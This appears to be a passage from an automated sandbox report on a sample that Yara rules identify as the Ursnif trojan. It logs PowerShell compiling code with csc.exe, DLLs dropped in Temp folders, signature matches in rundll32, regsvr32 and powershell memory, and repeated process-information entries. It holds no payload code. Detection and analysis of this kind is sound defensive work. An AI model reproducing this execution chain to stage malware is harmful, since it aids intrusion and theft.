            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: initial sampleStatic PE information: section name: .text entropy: 6.95280203957
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
